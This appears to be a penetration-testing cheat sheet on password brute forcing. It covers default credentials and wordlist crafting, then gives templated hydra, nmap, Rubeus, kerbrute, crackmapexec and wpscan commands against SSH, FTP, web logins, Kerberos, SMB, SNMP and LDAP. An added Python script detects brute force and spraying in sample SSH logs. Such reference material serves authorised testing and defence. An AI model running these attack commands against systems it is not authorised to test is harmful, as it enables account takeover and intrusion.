Brute Forcing
One way to gain access to a company's website, service, infrastructure, computers, etc. is through default or weak credentials. For example, the administrator password for the company's firewall could be "spring2022".
Many web applications, services, and devices ship with a default administrator account and a default password, and that password is often never changed after the device is set up. This gives an attacker the opportunity to look up the default credentials for the technology and use them to gain access.
Try to identify the software, find whether it uses default passwords and if so, what they are:
- Search for "<SOFTWARE> default password".
- Try the same user as the password.
- Review the documentation.
- Review the source code, if available.
- Check for default credentials databases:
If the default credentials for the target do not work, an attacker can use existing dictionaries of common passwords or craft a dictionary that fits the password policy of the targeted company.
Prebuilt dictionaries with thousands of passwords already exist.
Based on the information gathered about the target, personalized dictionaries can be crafted, and there are tools that make this easier.
- Cewl: Crawls the website you provided for commonly-used keywords and collects them into a list for you.
# -n (--no-words) would suppress the word list, so it is omitted here; -m is the minimum word length, -d the crawl depth
cewl <URL> --with-numbers -m 5 -d 3 -w output.txt
- Crunch: you specify a character set and a length range, and it generates every string of those lengths from the characters you specify (a huge number of candidates).
# Generate a combination with a set of alphanumeric characters
crunch 5 8 abcdefghijlkmnñopqrstuvwxyzABCDEFGHIJLKMNÑOPQRSTUVWXYZ0123456789
- Cupp: Generates passwords based on provided keywords about the target.
cupp -i
This subsection contains commands to perform brute force attacks on different technologies.
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} ftp://<TARGET>
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ssh://<TARGET>
nmap -n -p 22 --script ssh-brute <TARGET>
nmap -n -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'<USER1>', '<USER2>'}, ssh.privatekeys={'<PRIVATE_KEY_1>', '<PRIVATE_KEY_2>'}" <TARGET>
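The SSH attempts above leave a characteristic trail in the sshd log. As an added example that is not part of the original page, the following Python script scans constructed OpenSSH syslog lines and flags a source that produces many failures in a short window (the hydra/ssh-brute pattern) or fails against many distinct accounts (password spraying); the host name, addresses and thresholds are made-up assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches OpenSSH "Failed password" lines in syslog format.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sample log (hostname "bastion" and the addresses are made up for this example).
SAMPLE_LOG = """\
Mar 13 10:00:01 bastion sshd[2201]: Failed password for invalid user admin from 198.51.100.7 port 40110 ssh2
Mar 13 10:00:02 bastion sshd[2203]: Failed password for root from 198.51.100.7 port 40111 ssh2
Mar 13 10:00:03 bastion sshd[2205]: Failed password for invalid user oracle from 198.51.100.7 port 40112 ssh2
Mar 13 10:00:04 bastion sshd[2207]: Failed password for invalid user test from 198.51.100.7 port 40113 ssh2
Mar 13 10:00:05 bastion sshd[2209]: Failed password for root from 198.51.100.7 port 40114 ssh2
Mar 13 10:05:00 bastion sshd[2300]: Failed password for alice from 203.0.113.9 port 50001 ssh2
Mar 13 10:05:20 bastion sshd[2301]: Accepted password for alice from 203.0.113.9 port 50001 ssh2
"""

def parse_failures(lines, year=2024):
    """Yield (timestamp, username, source_ip) for each failed-password line."""
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins, disconnects, etc. are not counted
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]

def detect(lines, window_s=60, threshold=5, spray_users=3):
    """Return {source_ip: sorted alert kinds} for the failures seen in `lines`."""
    recent = defaultdict(deque)   # ip -> failure timestamps inside the sliding window
    users = defaultdict(set)      # ip -> distinct usernames tried
    alerts = defaultdict(set)
    for ts, user, ip in parse_failures(lines):
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:            # many failures in a short window: brute force
            alerts[ip].add("bruteforce")
        users[ip].add(user)
        if len(users[ip]) >= spray_users:  # many accounts from one source: spraying
            alerts[ip].add("spray")
    return {ip: sorted(kinds) for ip, kinds in alerts.items()}

if __name__ == "__main__":
    print(detect(SAMPLE_LOG.splitlines()))  # {'198.51.100.7': ['bruteforce', 'spray']}
```

The single typo from 203.0.113.9 stays below both thresholds, so only the scanning source is reported.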
During a web assessment, an attacker may encounter various login portals that can be brute-forced.
hydra -I {-l <username> | -L <USERS.TXT>} {-p <PASSWORD> | -P <WORDLIST.txt>} -f <IP> -s <PORT> http-get <URL>
hydra {-l <username> | -L <USERS.TXT>} {-p <PASSWORD> | -P <WORDLIST.txt>} <TARGET> -V http-form-post '<ENDPOINT>:<username=^USER^&pwd=^PASS^>:<WRONG CREDENTIALS MESSAGE>'
Note: Currently, hydra does not support forms protected by CSRF tokens. In that case, a solution is to use Burp Suite.
wpscan --url <WORDPRESS_URL> --passwords <WORDLIST.TXT> --usernames <USERS.TXT> --max-threads <NUMBER_THREADS>
There are several ways to perform a brute-force attack against a Kerberos service.
# with a list of users
python kerbrute.py -domain <DOMAIN> -users <USERS.TXT> -passwords <WORDLIST.TXT> -outputfile <OUTPUT.TXT>
.\Rubeus.exe brute /users:<USERS.TXT> /passwords:<WORDLIST.TXT> /domain:<DOMAIN> /outfile:<OUTPUT.TXT>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<WORDLIST.TXT> /outfile:<OUTPUT.TXT>
nmap -n -p110 --script pop3-brute <TARGET>
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f <TARGET> pop3 -V
For SMB, first check the domain password policy to avoid locking out accounts.
crackmapexec smb <IP> --pass-pol
Then you can brute-force with the following tools.
crackmapexec smb <TARGET> -u {<USERS.TXT>|<USER>} -p {<WORDLIST.TXT>|<PASSWORD>} [--continue-on-success]
hydra {-L <USER.TXT> | -l <USERNAME>} {-P <WORDLIST.TXT> | -p <PASSWORD>} smb://<TARGET>
You can brute force SNMP community strings with hydra.
hydra -P /usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt <TARGET> snmp
The nmap ldap-brute script attempts to brute-force LDAP authentication. By default it uses the built-in username and password lists; to use your own lists, pass the userdb and passdb script arguments.
nmap --script ldap-brute -p 389 <IP>
Another option is to use hydra.
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ldap2://<TARGET>